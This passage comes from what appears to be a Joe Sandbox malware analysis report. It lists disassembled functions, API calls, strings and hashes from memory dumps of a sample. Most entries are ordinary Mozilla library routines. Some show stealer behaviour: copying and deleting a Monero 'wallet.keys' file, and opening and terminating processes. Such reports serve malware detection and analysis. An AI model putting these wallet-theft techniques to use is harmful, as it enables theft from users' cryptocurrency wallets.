Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: e2a582261eeca50a4f1f93a384fdb9d1b0a225c4f031073236184f83bbb345c8
Instruction ID: 75f4060d866df39a49b2399239ab9442a0f51fcbf014a942fed93075b3f33f1c
Opcode Fuzzy Hash: e2a582261eeca50a4f1f93a384fdb9d1b0a225c4f031073236184f83bbb345c8
Instruction Fuzzy Hash: FF216DF1A40208AFDB00DFD4DD49FAEBBB9FB48700F104219F605A7680C779A900CBA5

Function 6C62E550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C62E577
AcquireSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C62E584
ReleaseSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C62E5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C62E8A6

Strings

MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C62E777
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C62E722, 6C62E750, 6C62E7A2
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C62E826, 6C62E850
MOZ_PROFILER_STARTUP, xrefs: 6C62E5A1, 6C62E5CC, 6C62E5FF, 6C62E62A
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C62E655

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: c54cea0f739e6d7adbba405ebefaf39c9274aa1d967a6ed53c104e23d7bcde33
Instruction ID: 37b6491f148e30961dbe40298f807e356eee30c732ef36fb0a6f0de5eeaa13d8
Opcode Fuzzy Hash: c54cea0f739e6d7adbba405ebefaf39c9274aa1d967a6ed53c104e23d7bcde33
Instruction Fuzzy Hash: A5112A31604254DFCB009F27C888B69BBB4FBC9369F410519E89557B51D774A805CFAB

Function 00488D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0048951E,00000000), ref: 00488D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00488D62
wsprintfW.USER32 ref: 00488D78

Strings

%hs, xrefs: 00488D6F

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: b7b9d6b7cebd46ee4bf166386c7372f8bb800e41940652e2e4728a89a0fe2f45
Instruction ID: 34134da81248140181aeb7a4fa53f56592a3f7e3116884f2f94f182295505579
Opcode Fuzzy Hash: b7b9d6b7cebd46ee4bf166386c7372f8bb800e41940652e2e4728a89a0fe2f45
Instruction Fuzzy Hash: B6E086B4A40208BFC700DBD4DC0DE5977BCEB04701F000254FD0987640D9715E408B56

Function 6C630C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C630CD5

Part of subcall function 6C61F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C61F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C630D40
free.MOZGLUE ref: 6C630DCB

Part of subcall function 6C605E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C605EDB
Part of subcall function 6C605E90: memset.VCRUNTIME140(ewdl,000000E5,?), ref: 6C605F27
Part of subcall function 6C605E90: LeaveCriticalSection.KERNEL32(?), ref: 6C605FB2

free.MOZGLUE ref: 6C630DDD
free.MOZGLUE ref: 6C630DF2

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 03ab04fdcb2cde7d40383650a5835e40b41acafa34737e4edc439f5a18dbf5de
Instruction ID: b868136369aca48b11043d3e4bde3fc96262a1f90036484dc28c6825c7f1a4e8
Opcode Fuzzy Hash: 03ab04fdcb2cde7d40383650a5835e40b41acafa34737e4edc439f5a18dbf5de
Instruction Fuzzy Hash: 90412B719187949BD320CF29C18079AFBE5BFC9714F509A2EE8DC87B50D7709449CB8A

Function 6C63CCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C62DA31,00100000,?,?,00000000,?), ref: 6C63CDA4

Part of subcall function 6C5FCA10: malloc.MOZGLUE(?), ref: 6C5FCA26

Part of subcall function 6C63D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C63CDBA,00100000,?,00000000,?,6C62DA31,00100000,?,?,00000000,?), ref: 6C63D158
Part of subcall function 6C63D130: InitializeConditionVariable.KERNEL32(00000098,?,6C63CDBA,00100000,?,00000000,?,6C62DA31,00100000,?,?,00000000,?), ref: 6C63D177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C62DA31,00100000,?,?,00000000,?), ref: 6C63CDC4

Part of subcall function 6C637480: ReleaseSRWLockExclusive.KERNEL32(?,6C6415FC,?,?,?,?,6C6415FC,?), ref: 6C6374EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C62DA31,00100000,?,?,00000000,?), ref: 6C63CECC

Part of subcall function 6C5FCA10: mozalloc_abort.MOZGLUE(?), ref: 6C5FCAA2

Part of subcall function 6C62CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C63CEEA,?,?,?,?,00000000,?,6C62DA31,00100000,?,?,00000000), ref: 6C62CB57
Part of subcall function 6C62CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C62CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C63CEEA,?,?), ref: 6C62CBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C62DA31,00100000,?,?,00000000,?), ref: 6C63D058

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
String ID:
API String ID: 861561044-0
Opcode ID: 4812f9fcacf2ef9faebb98a5374622a76128833e33dc90eaebe38efcb3fb9904
Instruction ID: 89dc786ad26bd6b6504f0c10630243f1fa87b7d7c9e1c49ac3492239c94528d0
Opcode Fuzzy Hash: 4812f9fcacf2ef9faebb98a5374622a76128833e33dc90eaebe38efcb3fb9904
Instruction Fuzzy Hash: 58D17071A04B169FD708CF28C580799F7E1BF89308F01972DE85987752EB31E9A5CB85

Function 0047D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0110A750,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01109178,?,\Monero\wallet.keys,00490E17), ref: 00488B86

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047D481
lstrlen.KERNEL32(00000000), ref: 0047D698
lstrlen.KERNEL32(00000000), ref: 0047D6AC
DeleteFileA.KERNEL32(00000000), ref: 0047D72B

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: e2c5c50ef8f2edd0b63930b4003f9e1df1f7c2e5aba120f8529b9fb1ee569360
Instruction ID: 35ed16b6f1647c967c7b78d2a67c36eaed80b8bbaac4cf37637a9e6b4e87d7a4
Opcode Fuzzy Hash: e2c5c50ef8f2edd0b63930b4003f9e1df1f7c2e5aba120f8529b9fb1ee569360
Instruction Fuzzy Hash: 6A9112718101049AEB08FBA5DC92EEE7339AF14304F50496FF51672091EFBC6A59CB7A

Function 6C605C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C605D40
EnterCriticalSection.KERNEL32(6C66F688), ref: 6C605D67
__aulldiv.LIBCMT ref: 6C605DB4
LeaveCriticalSection.KERNEL32(6C66F688), ref: 6C605DED

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 05f54d60e716afda21e317e530ed591c1d1f3293005d68e332d14211f9d57bc5
Instruction ID: cce30b4249da51edc37d36641235814c60c474fe0b55b6758fcc1e347ac9e85c
Opcode Fuzzy Hash: 05f54d60e716afda21e317e530ed591c1d1f3293005d68e332d14211f9d57bc5
Instruction Fuzzy Hash: 44514B71E041298FCF08CE6AC994ABEBBB2FB85304F19461AD811B7750C7706945CB9A

Function 6C5ECDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5ECEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C5ECEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C5ECF4E

Strings

0, xrefs: 6C5ECF30

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: 79db3d5dce246cce94af114b302d3b34c6a00329f4d09ac64e6a46a88dfefb23
Instruction ID: 41efb706514830a5ab68bdf3a99cd4b0b99892c40dfcad26b48ef6787dd54456
Opcode Fuzzy Hash: 79db3d5dce246cce94af114b302d3b34c6a00329f4d09ac64e6a46a88dfefb23
Instruction Fuzzy Hash: FE51F275A0425A8FCB05CF18C890AAABBA5EF99300F198599D8595F351D731FD06CBE0

Function 00483560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 8b7b9e8c852137dbb2d58c9f095da7f63ecb92f23d2749be523864c376896cc1
Instruction ID: ccb5d7aa9b7b36b6728dab0f45fe2db3312505e7cc7458bff0b10118afba8a45
Opcode Fuzzy Hash: 8b7b9e8c852137dbb2d58c9f095da7f63ecb92f23d2749be523864c376896cc1
Instruction Fuzzy Hash: 9D4141B1D10109AFDB04FFE5C845AEE7774AF44704F10881AE41576251EB7CAA46CBAA

Function 6C626470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C6282BC,?,?), ref: 6C62649B

Part of subcall function 6C5FCA10: malloc.MOZGLUE(?), ref: 6C5FCA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6264A9

Part of subcall function 6C61FA80: GetCurrentThreadId.KERNEL32 ref: 6C61FA8D
Part of subcall function 6C61FA80: AcquireSRWLockExclusive.KERNEL32(6C66F448), ref: 6C61FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C62653F
free.MOZGLUE(?), ref: 6C62655A

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 22063542d13da2d2a64c1fdbfd7e61276168f18fa56e9a3712eabec0aaf88e03
Instruction ID: 4abcd9520f327b3689c750ef67ca7e0d32e285fee723f26282f4416c299544ca
Opcode Fuzzy Hash: 22063542d13da2d2a64c1fdbfd7e61276168f18fa56e9a3712eabec0aaf88e03
Instruction Fuzzy Hash: 59318FB5A043159FC704CF25D884A9ABBE4FF89314F00482EE89A97741DB34E919CFDA

Function 004894D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004894EB

Part of subcall function 00488D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0048951E,00000000), ref: 00488D5B
Part of subcall function 00488D50: RtlAllocateHeap.NTDLL(00000000), ref: 00488D62
Part of subcall function 00488D50: wsprintfW.USER32 ref: 00488D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 004895AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 004895C9
CloseHandle.KERNEL32(00000000), ref: 004895D6

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
